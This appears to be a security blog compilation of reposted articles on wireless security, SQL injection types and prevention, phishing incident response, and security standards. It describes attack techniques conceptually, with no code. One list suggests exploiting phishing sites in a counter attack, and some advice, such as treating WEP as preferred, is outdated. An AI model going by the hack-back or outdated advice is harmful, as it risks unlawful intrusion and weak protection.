With many individuals and businesses connecting to the internet using wireless devices, and the reported cases of security breach and identity theft, having an awareness of wireless security measures to improve system security is a must. Many wireless users simply do not know that they are open and exposed to system penetration and bandwidth theft. Here are several suggestions to prevent your system from becoming a wireless hotspot.

(i) Change the password on your router. All routers come with preset service identifiers. Hackers are familiar with these protocols. You should change the password to something that is difficult to guess. Do not change the passwords to something as simple as myrouter which is easy to guess. You can rotate passwords frequently as an extra precaution.

(ii) Enable encryption. You should follow the encryption procedures provided by your routing device. WEP and WPA2 are the two preferred encryption measures with WPA2 the preferred and most up to date option. This technology encrypts traffic and scrambles it so that unauthorized third parties can’t make use of it throwing a spanner in the works for packet sniffers looking to procure sensitive details.

(iii) Keep a close check on remote access points. For companies that run web interfaces or remote system access points, security protocols should be established. Password access should be changed frequently.

(iv) Avoid using unsecured wireless hotspots in public locations. Malicious third parties frequently setup traps that are designed to route traffic through setups that are used to screen traffic with the intention of securing sensitive details.

(v) Always scrub all hardware that is sold or disposed of. This eliminates the chance that a third party can discover sensitive data or passwords that can be used for identity theft, financial crime or to gain access to corporate systems.

(vi) Use wireless security software. Whether you’re an individual or a corporation, this software has many benefits. A program such as Mcafee wireless home network security uses automatic security key rotation every three hours for encryption purposes. The software also secures your router and provides event logging and alert monitoring to scrutinize for terminals attempting to gain access. Institutions should consider more advanced software such a Manage Engine Wifi Manager.

Taking the time to plan and implement security measures prior to wireless use is the best way to protect yourself. A little extra time during setup is time well worth spent.

Andrew Winthorp owns and operates http://www.wireless-network-tutorials.com Wireless Network Tutorials – Learn more about key aspects of wireless setup and security.

Article Source: http://EzineArticles.com/?expert=Andrew_Winthorp

WARNING:

The information provided is for educationally purposes only and not to be used for malicious use.

Before digging into what actually SQL Injection is, let me explain you what is SQL itself.

What is SQL?

Structured Query Language (SQL) is a specialized programming language for sending queries to databases. Most small and industrial- strength database applications can be accessed using SQL statements. SQL is both an ANSI and an ISO standard. However, many database products supporting SQL do so with proprietary extensions to the standard language. Web applications may use user-supplied input to create custom SQL statements for dynamic web page requests.

What is SQL Injection?

SQL injection is a technique that exploits a security vulnerability occurring in the database layer of a web application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is in fact an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.

“SQL Injection” is subset of the unverified/unsanitized user input vulnerability (“buffer overflows” are a different subset), and the idea is to convince the application to run SQL code that was not intended. If the application is creating SQL strings naively on the fly and then running them, it’s straightforward to create some real surprises.

Many organization’s web servers has been compromised just because of SQL Injections, including big names which I would not like to mention here, you can search it easily on Internet.

What is Blind SQL Injection?

This particular type of attack is called a blind SQL injection attack, because the attacker cannot take advantage of detailed error messages from the server or other sources of information about the application. Getting the SQL syntax right is usually the trickiest part of the blind SQL injection process and may require a lot of trial and error. But, by adding more conditions to the SQL statement and evaluating the Web application’s output, an attacker will eventually determine whether the application is vulnerable to SQL injection.

Blind SQL injection a special case that plays on the web developers or website owners sense of security. While they may think that everything on the server is tightly guarded a Blind SQL injection attack will silently be playing truth or consequences with the web server. This type of attack though very time consuming is one that provides the most potentially damaging security hole. This is because an attacker gets not only access but is provided with an enormous amount of knowledge about the database and can potentially gain access to a servers file system. This type of attack is one that is automated and requires good amount of setup to succeed. But once it is done it does not require a great deal of effort to repeat.

What is Error message SQL Injection?

Web applications commonly use SQL queries with client-supplied input in the WHERE clause to retrieve data from a database. When a Web application executes such queries without validating or scanning the user-supplied data to ensure it’s not harmful, a SQL injection attack can occur. By sending unexpected data, an attacker can generate and submit SQL queries to a web applications database. A test for SQL injection vulnerabilities takes place by sending the application data that generates an invalid SQL query. If the server returns an error message, that information can be used to try to gain uncontrolled access to the database. This is the basis of one of the most popular SQL injection attacks.

Hiding error messages does not stop the SQL injection attack. What typically happens is the attacker will use the knowledge gained from the failure of this attack to change tactics. What they turn to is blind SQL injection.

Why SQL Injection?

When a web application fails to properly sanitize user-supplied input, it is possible for an attacker to alter the construction of backend SQL statements. When an attacker is able to modify a SQL statement, the process will run with the same permissions as the component that executed the command. (E.g. Database server, Web application server, Web server, etc.). The impact of this attack can allow attackers to gain total control of the database or even execute commands on the system.

When a machine has only port 80 opened, your most trusted vulnerability scanner cannot return anything useful, and you know that the admin always patch his server, this is the point where malicious hacker would turn to web hacking. SQL injection is one of type of web hacking that require nothing but port 80 and it might just work even if the admin is patch-happy. It attacks on the web application (like ASP, JSP, PHP, CGI, etc) itself rather than on the web server or services running in the OS.

Types of SQL Injections:

There are four main categories of SQL Injection attacks against databases layer in Web Application

1. SQL Manipulation: manipulation is process of modifying the SQL statements by using various operations such as UNION .Another way for implementing SQL Injection using SQL Manipulation method is by changing the where clause of the SQL statement to get different results.

2. Code Injection: Code injection is process of inserting new SQL statements or database commands into the vulnerable SQL statement. One of the code injection attacks is to append a SQL Server EXECUTE command to the vulnerable SQL statement. This type of attack is only possible when multiple SQL statements per database request are supported.

3. Function Call Injection: Function call injection is process of inserting various database function calls into a vulnerable SQL statement. These function calls could be making operating system calls or manipulate data in the database.

4. Buffer Overflows: Buffer overflow is caused by using function call injection. For most of the commercial and open source databases, patches are available. This type of attack is possible when the server is un-patched

SQL Injection Prevention Techniques:

Mitigation of SQL injection vulnerability would be taking one of the two paths i.e. either using stored procedures along with callable statements or using prepared statements with dynamic SQL commands. Whichever way is adopted the data validation is must.

a. Input validation

Data sanitization is key. Best way to sanitize data is to use default deny, regular expression. Write specific filters. As far as possible use numbers, numbers and letters. If there is a need to include punctuation marks of any kind, convert them by HTML encoding them. SO that ” become “”" or > becomes “>” For instance if the user is submitting the E-mail address allow only @, -, . And _ in addition to numbers and letters to be used and only after they have been converted to their HTML substitutes

b. Use of prepared statement

The prepared statements should be used when the stored procedures cannot be used for whatever reason and dynamic SQL commands have to be used.

Use a Prepared Statement to send precompiled SQL statements with one or more parameters. Parameter place holders in a prepared statement are represented by the? And are called bind variables. Prepared statement are generally immune to SQL Injection attacks as the database will use the value of the bind variable exclusively and not interpret the contents of the variable in any way. PL/SQL and JDBC allow for prepared statements. Prepared statements should be extensively used for both security and performance reasons.

c. Use minimum privileges

Make sure that application user has specific bare minimum rights on the database server. If the application user on the database uses ROOT/SA/dbadmin/dbo on the database then; it surely needs to be reconsidered if application user really needs such high amount of privileges or can they be reduced. Do not give the application user permission to access system stored procedures allow access to the ones that are user created.

d. Stored procedures

To secure an application against SQL injection, developers must never allow client-supplied data to modify the syntax of SQL statements. In fact, the best protection is to isolate the web application from SQL altogether. All SQL statements required by the application should be in stored procedures and kept on the database server. The application should execute the stored procedures using a safe interface such as Callable statements of JDBC or CommandObject of ADO.

And many more ….

article by Raheel Ahmad, CISSP

Article Source: http://EzineArticles.com/?expert=Raheel_Ahmad

Here’s an excerpt from the UK Computing article here:

A laptop owned by consultancy Deloitte which held information about staff under BSkyB’s pension plan has been stolen, Computing can reveal.

The computer was taken from a Deloitte employee in September at a public place and contained names, dates of birth and salary figures to be used for audit work on the broadcaster’s pension scheme.

BSkyB said the data did not include bank or address details and claimed it is highly unlikely that the information will be mishandled due to the laptop’s reliable data security set-up.

“The laptop was protected by a number of security measures, including passwords, user IDs and encryption of the majority of the information, so we are confident that the risk of data access or misuse is low,” said a BSkyB spokeswoman.

The fact that the spokeswoman says they used encryption on “the majority of the information” signals to me that they weren’t using whole disk encryption which is a common practice on laptops these days.

I’m sure if they were using full disk encryption they would have been 100% confident that the data was protected and they wouldn’t have had to notify the media about the loss.

What do you think?

By Joe Cole

Combating fraudulent transactions starts with creating and implementing your organization’s data security policy. Consumers expect that eCommerce merchants protect the personal payment information they provide during a transaction and that it will only be used for completing the transaction. They also expect that merchants explain the measures and procedures they have set in place to keep sensitive account data save. To address your customers’ expectations and to prevent fraudulent activities, eCommerce merchants shouldconsider implementing the following best practices regarding information security:

• Educate Consumers about your Security Practices. Create a page that details your website’s security practices and controls. Consider including in it the following:
  • A detailed explanation on how payment information is protected at all stages of the transaction process: during transmission, while on your server and at your physical work site.
  • Make the page available to all visitors to your website. You should consider placing a link to it in your home page. Placing a link in your header or footer will make the page accessible from any page of your website.
• Create a Security Section in your FAQ Page. If you have not already, you should create a FAQ page and include in it questions and answers on how customers can protect themselves while shopping online.
• Add the Logos of Fraud Prevention Services that you are Using. Place on your website the logos of all fraud prevention and data protection services that you are using.
• Warn Customers against Sending Payment Information by Email. Email is not a secure way to do business, however some customers are not aware of that. To better protect their personal information you should highlight your security practices on your website and in your email correspondence. Advise customers that: 
  • Email is an insecure method of communication and should never be used for transmitting account data or other sensitive information.
  • Your website is using SSL encryption services ensure that personal information is protected from unauthorized access and provides the safest way for shopping online.

Merchant Services

Business Merchant Account

Article Source: http://EzineArticles.com/?expert=Joe_Cole

In today’s’ high tech world, maintaining the privacy and protection of customers and employees’ information grows more and more difficult particularly for many financial institutions. These days’ scammers are getting bolder and more brazen in their abilities to get personal information from banking customers as they aggressively target the smaller locally owned community financial institutions. In fact, a recent customer reported a complex, malicious, and targeted attack took place on their institution’s customers and employees. A well-recognized phishing activity trends website reported that financial institutions saw a continuing rise in phishing activities with 92.5% of attacks targeted on financial institutions. On average, a phishing site stays online for 3.8 days. The relevance to the number of days online is that the longer it remains online, the more possibilities for the scammer to gather personal information. It is imperative that we are prepared for this type of incident and the response that is needed.

Phishing and Pharming Attacks

There was a time when only the larger financial institutions such as Wells Fargo bank were targeted for phishing and pharming scams, but that’s no longer the case. The increase in phishing attacks on community financial institutions stems from the fact that smaller financial institutions are simply more profitable and are usually less protected from fraudulent activities. As mentioned above, one of our local community financial institutions was hit with a complex and sophisticated vishing/pharming/phishing telephone scam that focused on customers as well as on the bank’s employees. Fortunately, we have been preparing our client for years for these types of attacks, and therefore they were on the alert, so the attack caused minimum disruption. Sharp customers and employees recognized that the e-mail messages were a scam because of poor grammar and content in addition to the salutation being addressed to “member” or some other nondescript person. A genuine message from a financial institution always addresses the customer by their full name. Furthermore, the scams did not provide a means for contacting the institution if there were any questions, but instead told the customers and employees in the e-mail message not to reply. No legitimate institution would ever tell you not to reply. But even with preparation and after years of working in the Internet security arena, we were surprised at the combination of attack vectors used.

Combination of Attack Vectors

The scammers’ used a variety of strategies starting with a mass email and pharming scam as an attempt to steal personal information using a Do-IT-Yourself Phishing kit. The initial attack was then followed up with telephone calls to certain area codes with spoofed numbers and using a technique called Vishing. Besides, using pharming, phishing, and vishing tactics aimed at stealing valuable information such as credit cards, social security numbers, IDs and passwords, the attackers didn’t stop there. The scammers also included Spear Phishing, an email spoofing fraud that targets financial institution employees in an attempt to gain unauthorized access to confidential data. Because of the banks watchful eye, they caught it in time, but these types of attacks are getting bolder and more commonplace and require a great deal more vigilance in keeping personal information away from scammers.

Why Customers Are Fooled

Approximately 19% of recipients respond to Spear-Phishing, which today is one of the most menacing threats to Internet users. Unfortunately, users do not clearly understand the importance of checking for authenticity, which should include specific indications that the site they are being sent to is secure. As a busy society, we are so focused on getting the job done quickly and efficiently, we often don’t check for important clues, which is why many users receiving messages or paying bills online don’t watch out for the clues that indicate whether an e-mail message or site is fraudulent.

An Incident Response Plan

As these scams are on the rise in financial institutions, if a financial institution is prepared, and in today’s world, they have to be, the consequences will be minimal. In the event of phishing and pharming scams, staff members in a financial institution should know how to deal with this type of situation effectively. To ensure the customer’s safety and privacy, an incident response plan should be in place and is required by examiners to be in place. Included in the plan should be an organized approach as to how the problem is going to be handled as well as having a clearly laid out plan to address the situation.

The following should be considered in regard to an Incident Response Plan:

• Start by assessing the situation so that you know exactly what your bank is dealing with; if an incident has occurred, it’s usually up to the CEO and CIO to handle the overall incident response along with members of a CSIRT.
• Fight the attacker
• Educating the end user
• Redirecting pharming clicks to an education page (most attacks are pulling images from your site)
• Attempt to shut down the phishing site yourself
• If needed have a competent vendor to respond to the situation for counter attack; this helps identify who will take down the website as well as which agencies to contact.
• Exploit the phising website
• Communicate with customers
• Post Bulletins on Website to ensure customers are aware of the situation
• Have employees assure customers that security controls are in place for the institution.
• Contact authorities such as Secret Service, FBI; in addition, contact Financial Service Vendors for support on abnormal activity on customer accounts.
• Feed bogus information to the pharmed sites.
• Review abnormal activities on Customer Accounts and bogus accounts
• Implement 3rd party monitoring companies

This is not intended to be a complete incident response plan, but trigger the thought process on items to be covered.

Preventative Actions

At one time or another your institution will be affected by a fraud scam, therefore being prepared with a good response plan for employees as well as providing customer education, in addition to having the resources (either in-house or outsourced) to handle the problem efficiently and effectively are the most effective preventive actions. Prevention of course is primary insofar as keeping phishing and pharming scams at bay, and therefore as a preventive measure, customers who use online banking in any financial institution should be warned to use caution when opening any type of email with links that appear to come from their financial institution. Even if the message looks legitimate, prudence is always best. Educate customers to be proactive rather than reactive. Alert customers not to click any links that come in emails, especially if they appear somewhat suspicious. In addition, if the customer has any doubt about the e-mail message, alert the customer to call their financial institution directly to determine whether it could potentially be a phishing or pharming scam.

Provide customers with Security Awareness Training by developing a web page about information disclosure in addition to providing a closely monitored email address for this activity should be set up by your institution where customers can send suspicious activities.

About the Author

Mr. Gale Yocom is a recognized technology expert and President of the Dallas-based security specialist company Covetrix. For the past ten years his company has provided full service networking and security solutions to government entities, financial institutions, and commercial businesses across the U.S. Performing security audits, penetration testing and implementation of security controls, he brings a wealth of knowledge and information to Internet security. Mr. Yocom is known for effectively uncovering weaknesses in institution’s security practices and has impressively strengthened the security posture of many financial institutions. Mr. Yocom can be reached by contacting him at gale(at)covetrix.com or by visiting him on the web at www.covetrix.com

Article Source: http://EzineArticles.com/?expert=Gale_Yocom
http://EzineArticles.com/?Sophisticated-Attacks-on-Community-Financial-Institutions-Increasing!&id=909211

This is a description of the hardening guide:

This guide focuses on how to help create and maintain a secure environment for desktop and laptop computers that run Windows Vista. The guide explains the different stages of how to secure two different environments, and what each security setting addresses for the desktop and laptop computers deployed in either one. The guide provides prescriptive information and security recommendations.

Here are the chapters:

Chapter 1: Implementing the Security Baseline
Chapter 2: Defend Against Malware
Chapter 3: Protect Sensitive Data
Chapter 4: Application Compatibility
Chapter 5: Specialized Security – Limited Functionality
Appendix A: Security Group Policy Settings

Don’t install Vista without it!

Included in the suggestions are:

• http://www.sans.org/resources/policies/
• http://csrc.nist.gov/publications/nistpubs/index.html
• CoBIT (http://www.isaca.org/cobit)
• ISF Security Standard (http://www.isfsecuritystandard.com)
• ISO27XXX series (http://www.iso.ch)
• IT Baseline Protection Manual (http://www.bsi.de/english/gshb/index.htm)
• Plus many more

Definitely worth checking out!

George Ou has written extensively about wireless LAN security and he’s published several articles on common wireless LAN security myths in ZDNet over the years. His latest article, “Wireless LAN security myths that won’t die” can be found on his ZDNet blog here.

He categorizes the myths he debunks as follows:

Waste of money, resources, time

• MAC filtering
• Disable DHCP and use Static IP addresses
• Signal suppression with expensive paint or antenna placement

Worse than no wireless security at all

• LEAP (adding EAP-FAST to the list)
• SSID Access Point beacon suppression (or “hiding”)

Has nothing to do with security mechanisms

• Just use 802.11a or Bluetooth

Even if you’re not writing your wireless security standard, read George’s article and make sure you aren’t spreading myths and making yourself look dumb in front of others who know better!

It includes requirements for large deployments and small/individual deployments as well as requirements that are common for all deployments.

Here’s an excerpt:

Common Requirements

Please review the University Wireless Policy for policy related information.

Minimum Technical Requirements

• Locate APs on the interior of buildings instead of near exterior walls and windows as appropriate.
• Place APs in secured areas to prevent unauthorized physical access and user manipulation.
• Change the default service set Identifier (SSID).
• Ensure that AP channel selection utilizes the maximum amount of non overlapping channels for the given spectrum.
• Use WPA or greater encryption.
• APs shall not be plugged into network hubs.
• Ensure that all APs have strong administrative passwords.
• Use SNMPv3 and/or SSL/TLS for Web-based management of APs.
• Access points cannot interfere with any part of the central University wireless network
• When disposing of access points that will no longer be used, clear access point configuration to prevent disclosure of network configuration, keys, passwords, etc.

Here’s an archived copy of the standard: Wireless Security Standards

Great info! Check it out!

Here’s an excerpt:

3.1 Content Filtering

Employ a content filtering mechanism that scans all incoming e-mail messages and their attachments and manages the messages depending on the results of the scan.

3.1.1 Suspicious Content

Strip suspicious active content (ActiveX, JavaScript, etc.) from e-mail and forward to quarantine.

3.1.2 Prohibited Words

Quarantine e-mails that contain words or phrases that indicate the e-mail is “junk” or “spam”, words in the “Carlin List” and words that are racist, libelous, offensive or obscene.

3.1.3 Outbound Filtering

Protect the organization from possible litigation or loss of sensitive data by implementing outbound e-mail filtering.

3.1.3.1 Quarantine outbound e-mails that contain words or phrases viewed as inappropriate for use in organizational e-mail, including hoaxes and “spam”.
3.1.3.2 Quarantine outbound e-mails that contain words or phrases that indicate sensitive data is leaving the organization.

An archive of the standard is here: E-mail Filtering Standard

Let me know if you have any suggestions!